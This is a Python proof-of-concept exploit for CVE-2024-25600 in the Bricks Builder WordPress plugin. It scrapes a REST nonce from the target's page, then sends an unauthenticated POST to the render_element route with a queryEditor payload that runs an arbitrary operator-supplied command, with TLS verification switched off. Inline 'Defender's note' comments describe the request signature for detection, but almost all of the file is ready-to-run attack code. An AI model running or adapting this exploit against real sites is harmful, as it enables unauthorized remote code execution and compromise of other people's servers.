CVE-2024-25600 (Bricks Builder RCE)
# CVE-2024-25600 (Bricks Builder RCE)
# Published proof-of-concept. The inline "Defender's note" comments below
# describe the request pattern this script generates so that it can be
# recognised in logs and blocked; the mitigation is the vendor fix for
# CVE-2024-25600.
import requests
import sys
import urllib3
import re

# Silences the InsecureRequestWarning that every verify=False request in this
# file would otherwise print. Consequence: the target's TLS certificate is
# never validated anywhere in this script.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def fetch_nonce(target_url):
    """Return the Bricks REST nonce printed into the target's page HTML, or None.

    Performs an unauthenticated GET of ``target_url`` (no cookies, no auth
    header) and searches the response body for a ``"nonce":"<hex>"`` pair,
    which Bricks emits in its inline ``bricks-scripts-js-extra`` script data.

    Args:
        target_url: Base URL of the site, including the scheme.

    Returns:
        The nonce string when found, otherwise ``None``. Every failure mode
        (connection error, non-2xx status, nonce absent from the page) is
        printed to stdout and collapsed into ``None``; callers cannot tell
        them apart, which matters for the HTTPS/HTTP fallback in the caller.

    Defender's note: because this GET carries no credentials, the nonce it
    recovers is not an access control on its own. The request is presumably
    indistinguishable from a normal page load in access logs, so detection
    should focus on the subsequent REST call, not on this step.
    """
    try:
        print(f"[*] Retrieving nonce from {target_url}...")
        # verify=False: TLS certificate validation is disabled (warning
        # suppressed at import time); 10 s timeout bounds the wait.
        r = requests.get(target_url, verify=False, timeout=10)
        # Any HTTP error status is turned into an exception and handled below.
        r.raise_for_status()
        # Regex to find the nonce in the bricks-scripts-js-extra block
        # Pattern looks for: "nonce":"<hex_string>"
        # Only lowercase hex digits are accepted; the first match wins.
        match = re.search(r"\"nonce\":\"([a-f0-9]+)\"", r.text)
        if match:
            nonce = match.group(1)
            print(f"[+] Nonce found: {nonce}")
            return nonce
        else:
            print("[-] Nonce not found in response.")
            return None
    except Exception as e:
        # Broad catch: network errors, HTTP errors and anything else are all
        # reported the same way and mapped to None.
        print(f"[-] Error fetching nonce: {e}")
        return None
# --- Script entry: argument handling -------------------------------------
# Usage: <target> [command]. With no command argument the script sends "id".
if len(sys.argv) < 2:
    print(f"Usage: python3 {sys.argv[0]} <Target IP/URL> [Command]")
    print(f"Example: python3 {sys.argv[0]} https://10.64.186.168 \"whoami\"")
    sys.exit(1)
target_ip = sys.argv[1]
cmd = sys.argv[2] if len(sys.argv) > 2 else "id"
# Ensure target has protocol
# Note: startswith("http") also matches "https://", so either scheme given
# explicitly is used as-is and the fallback below is skipped.
if not target_ip.startswith("http"):
    # Try HTTPS first, then HTTP
    print("[*] No protocol specified, trying HTTPS first...")
    target = f"https://{target_ip}"
else:
    target = target_ip
# 1. Get the nonce automatically
nonce = fetch_nonce(target)
# fetch_nonce returns None for every failure (connection error, bad status,
# nonce absent), so any of those triggers the plaintext HTTP retry.
if not nonce and not target_ip.startswith("http"):
    # If HTTPS failed, try HTTP
    print("[*] HTTPS failed, trying HTTP...")
    target = f"http://{target_ip}"
    nonce = fetch_nonce(target)
if not nonce:
    print("[-] Could not retrieve nonce. Exiting.")
    sys.exit(1)
# 2. Prepare the exploit
# The only header sent is Content-Type; there is no cookie or auth header,
# so the REST call below is made as an unauthenticated client.
headers = {
    "Content-Type": "application/json"
}
# Defender's note: the observable signature of this script is an
# unauthenticated POST to this route whose JSON body sets
# "useQueryEditor" together with a "queryEditor" string. Alert on that
# shape and apply the vendor fix for CVE-2024-25600.
url = f"{target}/wp-json/bricks/v1/render_element"
# Using backticks for JS template literal
query_cmd = "throw new Exception(`" + cmd + "`);"
payload = {
    "postId": "1",
    "nonce": nonce,
    "element": {
        "name": "container",
        "settings": {
            # "hasLoop" and "useQueryEditor" are sent as the string "true",
            # not as JSON booleans.
            "hasLoop": "true",
            "query": {
                "useQueryEditor": "true",
                "queryEditor": query_cmd,
                "objectType": "post"
            }
        }
    }
}
# 3. Send the payload
try:
    print(f"[*] Sending payload to {url}...")
    # Same verify=False / 10 s timeout as the nonce fetch; the body is sent
    # JSON-encoded via requests' json= parameter.
    r = requests.post(url, json=payload, headers=headers, verify=False, timeout=10)
    # The raw response body is printed unconditionally; no status check is
    # done, so a 4xx/5xx reply is printed the same way as a 200.
    print("[*] Response:")
    print(r.text)
except Exception as e:
    # Only transport-level failures land here; HTTP error statuses do not.
    print(f"[-] Exploit failed: {e}")